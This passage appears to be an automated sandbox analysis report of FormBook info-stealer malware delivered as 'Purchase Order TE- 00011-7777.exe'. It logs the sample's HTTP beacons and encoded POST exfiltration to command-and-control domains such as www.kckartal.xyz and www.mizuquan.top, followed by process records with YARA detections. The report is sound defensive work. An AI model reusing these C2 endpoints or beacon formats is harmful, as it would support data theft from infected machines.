                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.kckartal.xyz
                    Origin: http://www.kckartal.xyz
                    Referer: http://www.kckartal.xyz/h5qr/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 223
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 79 5a 4f 39 61 42 37 34 57 33 41 33 75 2b 70 65 74 71 73 53 78 76 72 70 68 6d 37 71 34 62 66 51 46 4e 2b 6e 32 4b 31 64 6d 59 70 54 79 76 45 71 4a 65 6c 77 75 6f 4b 53 55 31 66 78 45 4f 75 70 4e 63 34 67 45 59 35 72 38 46 5a 6c 32 6e 5a 52 64 72 69 33 71 5a 41 69 30 4c 71 69 50 4b 69 4c 67 7a 37 58 62 39 4f 42 66 34 77 2b 49 43 42 33 44 63 6e 63 38 54 31 6d 57 61 79 6f 65 73 6c 6f 6e 34 42 5a 4f 56 31 4b 53 37 68 4d 65 79 34 56 46 4d 39 61 42 4d 66 34 43 4a 71 67 44 32 47 47 6b 2f 62 30 6e 64 48 6b 54 71 35 41 46 59 69 6d 42 36 78 73 53 56 34 6c 35 77 63 66 79 58 63 34 30 39 75 52 56 2f 47 79 57 46 4b 38 4f 77 4d 30 79 71 67 72 49 4f 68 31 70 76 50 48
                    Data Ascii: nR=yZO9aB74W3A3u+petqsSxvrphm7q4bfQFN+n2K1dmYpTyvEqJelwuoKSU1fxEOupNc4gEY5r8FZl2nZRdri3qZAi0LqiPKiLgz7Xb9OBf4w+ICB3Dcnc8T1mWayoeslon4BZOV1KS7hMey4VFM9aBMf4CJqgD2GGk/b0ndHkTq5AFYimB6xsSV4l5wcfyXc409uRV/GyWFK8OwM0yqgrIOh1pvPH
                    Sep 12, 2024 13:04:40.895057917 CEST | 743 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:04:40 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    vary: User-Agent
                    x-turbo-charged-by: LiteSpeed
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fR0eDN0ahzolpeqCaEkjqCwzapq2rxqopn63SOWpsz5sKwF8MB81mDO0fgkR2G7x9UqFiBO6b7PUH2DMZ9BPGjSVS9jCoo9QFsq7x7VedTJgeZAm8Sz%2BTzgiRnvUv4PNDWDe"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c1f6b068c504397-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                    Data Ascii: f
                    Sep 12, 2024 13:04:40.896543026 CEST | 735 | IN | Data Raw: 32 63 33 0d 0a 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07
                    Data Ascii: 2c3dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhy


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    31 | 192.168.2.5 | 49744 | 104.21.20.125 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:04:42.874250889 CEST | 1761 | OUT | POST /h5qr/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.kckartal.xyz
                    Origin: http://www.kckartal.xyz
                    Referer: http://www.kckartal.xyz/h5qr/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 1239
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 79 5a 4f 39 61 42 37 34 57 33 41 33 75 2b 70 65 74 71 73 53 78 76 72 70 68 6d 37 71 34 62 66 51 46 4e 2b 6e 32 4b 31 64 6d 59 78 54 31 63 4d 71 49 38 4e 77 76 6f 4b 53 61 56 66 30 45 4f 75 4f 4e 64 52 70 45 59 30 55 38 47 68 6c 77 45 68 52 55 36 69 33 77 4a 41 69 39 72 71 6a 52 36 6a 44 67 79 4c 54 62 35 75 42 66 34 77 2b 49 42 4a 33 45 4f 44 63 2b 54 31 6c 58 61 7a 70 4d 63 6c 4d 6e 34 34 69 4f 52 70 77 52 49 35 4d 65 53 49 56 4a 66 46 61 4e 4d 66 36 50 70 71 34 44 7a 65 64 6b 37 37 47 6e 64 44 64 54 71 52 41 48 65 7a 69 46 35 56 6d 4c 45 74 42 78 69 4d 46 31 48 4a 42 33 4c 7a 71 52 4e 6d 58 4c 6d 57 45 4a 48 46 30 2f 71 74 67 52 4b 68 50 70 6f 54 4a 64 6f 6d 42 6d 33 71 50 69 54 4a 56 43 36 4e 70 50 57 44 45 41 79 64 32 59 79 75 5a 74 46 37 51 4f 72 79 4e 67 54 2b 37 52 57 64 7a 50 77 44 46 38 79 4d 51 36 42 42 34 4d 58 69 50 2b 6c 65 46 4e 2f 51 62 36 78 36 41 72 35 79 4e 50 4b 32 49 44 6c 73 52 78 6a 2b 6e 68 41 58 47 74 41 75 44 53 63 56 67 37 58 38 61 32 64 56 6b 67 4e 70 41 7a 63 50 [TRUNCATED]
                    Data Ascii: nR=yZO9aB74W3A3u+petqsSxvrphm7q4bfQFN+n2K1dmYxT1cMqI8NwvoKSaVf0EOuONdRpEY0U8GhlwEhRU6i3wJAi9rqjR6jDgyLTb5uBf4w+IBJ3EODc+T1lXazpMclMn44iORpwRI5MeSIVJfFaNMf6Ppq4Dzedk77GndDdTqRAHeziF5VmLEtBxiMF1HJB3LzqRNmXLmWEJHF0/qtgRKhPpoTJdomBm3qPiTJVC6NpPWDEAyd2YyuZtF7QOryNgT+7RWdzPwDF8yMQ6BB4MXiP+leFN/Qb6x6Ar5yNPK2IDlsRxj+nhAXGtAuDScVg7X8a2dVkgNpAzcPYvuAIxyaTZW5mzBq33cmnwQVkzXnDtdClB9XnmJdFs/8f53CC1NJH60akV1wMq3mQ1PHXpKxg3Yx0ccgxPhcUKBsq1TJSi6ZXuDIKrRDMArrbLam65LPj280h3yU87GSATI0NnueiVBh0MbXLhC6XgczpDrRR31qE3MHF93MloeD2zSaYQXeTRWhaNZRfND+o73SUXiF3zq5nfEgMq3JUsbW0PRlB41zuX53sTEGktKCUJlgeWrI1yvgsopeWKICSXN7RljKecwVAI2XXvQV0XQ0nQ21glMOw6Do+YucRqqj6NVTz+jEsx/0fTlvSGC5UnOcpBzdNNIZ+fy7f+rKdOtxYWvhncn5AsI42tZ2ez0NDzJjHq/2TM6STO/9VkaO5rU7N0R1YkyJ3GjDaLPuS5ruwNUtVp+6pyYYsccAfji05WmNuONQCMatL78GsV9UWSdfJLmj4zWd7Iu54ntw9yhC4SixVfSJmoMucXzUb66zB5/8UMkoRaEwfJ8Wi/BWCeJVeMHe8Q2WQ7JY+Tiyp0Iax4UeYFNwt7UX1CnlnpRqfPd8bMaj6PjRyGa3EPJVnONe1aek7s4oNxajZYSB58G/v+BnfieRIUuVCB6HmgSWIh7ls1ZEewT3jgtZBxzi56r6LuvKVjPQO/Axoop+qfueVeBrkZU913 [TRUNCATED]
                    Sep 12, 2024 13:04:43.482140064 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:04:43 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    vary: User-Agent
                    x-turbo-charged-by: LiteSpeed
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ySnAys4vajTxzl7Yg4RQWqJcEYQqkRpB%2FybzzWf2DWT6xymjP20YNYkw1n14Zpk5UzfGS8q76SLQ9PauYnPfkt%2FTaWF8l4MQB89%2BN1xDS1IBLEhe6zjUrzHR1xZFFRyD6HA0"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c1f6b169d296a57-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    Data Raw: 32 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                    Data Ascii: 2cddT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SS
                    Sep 12, 2024 13:04:43.482203007 CEST | 231 | IN | Data Raw: d9 4d 11 5b 21 86 09 e7 45 f9 40 b0 47 23 99 46 2c 5b 83 d2 17 8d 63 5d 3e d6 f4 c1 df 94 79 9a 89 6c d8 97 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04 14 47 d0 72 b5 9a
                    Data Ascii: M[!E@G#F,[c]>ylo:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?be
                    Sep 12, 2024 13:04:43.482933044 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    32 | 192.168.2.5 | 49745 | 104.21.20.125 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:04:45.422066927 CEST | 459 | OUT | GET /h5qr/?nR=/bmdZ0vLXnogocV3t4J0vpXKy2/OoNnhB87loKV3gq9LyeQpMfhyu6mMTgPwDPC8F+hhJIsm9BUDnxBtc5ev2o5O2JmBXO2rvj/sbpH3UdghJzgGJYmb4kNKd7aCf9ce4Q==&OJ=btRp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Language: en-US,en
                    Host: www.kckartal.xyz
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Sep 12, 2024 13:04:46.012533903 CEST | 707 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:04:45 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    vary: User-Agent
                    x-turbo-charged-by: LiteSpeed
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FhL9y84kDn1sEz%2BD9e2Qg0cQf7%2FoLEPYEVclK4CegNdVAvA6Sa3%2BJUHu398le0%2B1z71EgyBJrXzgHuMnrdNYexclUALeAguc1ca8Kxoi0e6i46CqI5ICAeELkTaY7OfAikbV"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c1f6b26596443ad-EWR
                    alt-svc: h3=":443"; ma=86400
                    Sep 12, 2024 13:04:46.012829065 CEST | 1236 | IN | Data Raw: 34 65 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65
                    Data Ascii: 4e2<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000
                    Sep 12, 2024 13:04:46.012864113 CEST | 32 | IN | Data Raw: 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: /div></body></html>10


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    33 | 192.168.2.5 | 49746 | 43.242.202.169 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:04:52.008840084 CEST | 724 | OUT | POST /ed2j/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.mizuquan.top
                    Origin: http://www.mizuquan.top
                    Referer: http://www.mizuquan.top/ed2j/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 203
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 4b 6c 77 76 31 45 45 4e 6d 63 63 50 79 4b 38 5a 50 68 79 6a 4f 59 38 70 66 76 53 79 4c 44 55 44 63 4d 6e 2f 51 5a 64 54 36 5a 74 2f 51 47 52 2b 66 46 43 62 52 41 37 57 75 46 61 4f 77 52 2b 35 62 66 54 4a 72 44 37 50 68 32 54 62 34 6e 43 4d 79 7a 58 7a 59 75 71 4e 6b 37 77 42 30 43 7a 52 75 55 65 38 58 30 4d 59 54 66 67 2f 69 66 6c 4c 6e 64 57 6c 37 42 46 5a 42 32 52 45 53 48 79 2f 63 79 48 7a 57 36 43 62 37 6a 6c 79 53 47 74 65 58 35 4d 75 41 74 54 54 30 78 58 6e 6f 33 44 36 68 69 73 54 39 59 68 45 2f 4e 6a 30 36 76 6c 50 70 37 41 53 75 37 35 62 34 5a 53 71 75 65 61 33 6b 4f 6c 61 34 4b 6b 3d
                    Data Ascii: nR=Klwv1EENmccPyK8ZPhyjOY8pfvSyLDUDcMn/QZdT6Zt/QGR+fFCbRA7WuFaOwR+5bfTJrD7Ph2Tb4nCMyzXzYuqNk7wB0CzRuUe8X0MYTfg/iflLndWl7BFZB2RESHy/cyHzW6Cb7jlySGteX5MuAtTT0xXno3D6hisT9YhE/Nj06vlPp7ASu75b4ZSquea3kOla4Kk=
                    Timestamp:Sep 12, 2024 13:04:52.881658077 CEST
                    Bytes transferred:691
                    Direction:IN
                    Data:HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:04:52 GMT
                    Content-Type: text/html
                    Content-Length: 548
                    Connection: close
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                    Session ID:34
                    Source IP:192.168.2.5
                    Source Port:49747
                    Destination IP:43.242.202.169
                    Destination Port:80
                    PID:4444
                    Process:C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp:Sep 12, 2024 13:04:54.549732924 CEST
                    Bytes transferred:744
                    Direction:OUT
                    Data:POST /ed2j/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.mizuquan.top
                    Origin: http://www.mizuquan.top
                    Referer: http://www.mizuquan.top/ed2j/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 223
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Ascii: nR=Klwv1EENmccPyqMZf2OjJ482B/SyBjU5cMr/QbwI5vd/Tnh+RkCbSA7WhlbEtB/3bfX3rCHPh2Hb4laMnQvwbeqLi7wHpSzRuUe8X0YyTbM/istLm47znxFeLWREYXz0cyGkW/ax7gNySGdeZIMtJtTVwxWvpCj05S0Ew701gOX+y5IlzZI69bVjoKad/u7e+t1qmdyI0j6hk/bG06ILq5me218C
                    Timestamp:Sep 12, 2024 13:04:55.402774096 CEST
                    Bytes transferred:691
                    Direction:IN
                    Data:HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:04:55 GMT
                    Content-Type: text/html
                    Content-Length: 548
                    Connection: close
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                    Session ID:35
                    Source IP:192.168.2.5
                    Source Port:49748
                    Destination IP:43.242.202.169
                    Destination Port:80
                    PID:4444
                    Process:C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp:Sep 12, 2024 13:04:57.113065004 CEST
                    Bytes transferred:1761
                    Direction:OUT
                    Data:POST /ed2j/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.mizuquan.top
                    Origin: http://www.mizuquan.top
                    Referer: http://www.mizuquan.top/ed2j/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 1239
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Ascii: nR=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 [TRUNCATED]
                    Timestamp:Sep 12, 2024 13:04:58.135854959 CEST
                    Bytes transferred:691
                    Direction:IN
                    Data:HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:04:57 GMT
                    Content-Type: text/html
                    Content-Length: 548
                    Connection: close
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                    Session ID:36
                    Source IP:192.168.2.5
                    Source Port:49749
                    Destination IP:43.242.202.169
                    Destination Port:80
                    PID:4444
                    Process:C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp:Sep 12, 2024 13:04:59.659583092 CEST
                    Bytes transferred:459
                    Direction:OUT
                    Data:GET /ed2j/?nR=HnYP2yoU4dt40olsHjvCR7kBP/y2BgIkbcmGMLslyKV8dFp2SGuaYgvLul2clibdaJeHhADQmhDO4iexoifjcdOeiKY5v07N606wVFpuauJi0/RjjYjigABfPEh6YVaweA==&OJ=btRp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Language: en-US,en
                    Host: www.mizuquan.top
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Timestamp:Sep 12, 2024 13:05:00.602796078 CEST
                    Bytes transferred:691
                    Direction:IN
                    Data:HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:05:00 GMT
                    Content-Type: text/html
                    Content-Length: 548
                    Connection: close
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->



                    Target ID:0
                    Start time:07:01:59
                    Start date:12/09/2024
                    Path:C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe"
                    Imagebase:0xa90000
                    File size:1'227'264 bytes
                    MD5 hash:74E3AD61908355D646036B6B13A20916
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    Target ID:2
                    Start time:07:02:00
                    Start date:12/09/2024
                    Path:C:\Windows\SysWOW64\svchost.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe"
                    Imagebase:0xf20000
                    File size:46'504 bytes
                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2243312339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2243312339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2243639009.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2243639009.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2244045785.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2244045785.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:true

                    Target ID:3
                    Start time:07:02:11
                    Start date:12/09/2024
                    Path:C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe"
                    Imagebase:0xf30000
                    File size:140'800 bytes
                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3887789383.0000000003A00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3887789383.0000000003A00000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:false

                    Target ID:4
                    Start time:07:02:14
                    Start date:12/09/2024
                    Path:C:\Windows\SysWOW64\RMActivate_ssp.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\SysWOW64\RMActivate_ssp.exe"
                    Imagebase:0xc40000
                    File size:478'720 bytes
                    MD5 hash:6599A09C160036131E4A933168DA245F
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3886646848.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3886646848.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3887684924.0000000000720000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3887684924.0000000000720000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3887626598.00000000006D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3887626598.00000000006D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    Reputation:moderate
                    Has exited:false

                    Target ID:6
                    Start time:07:02:27
                    Start date:12/09/2024
                    Path:C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe"
                    Imagebase:0xf30000
                    File size:140'800 bytes
                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3889597488.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
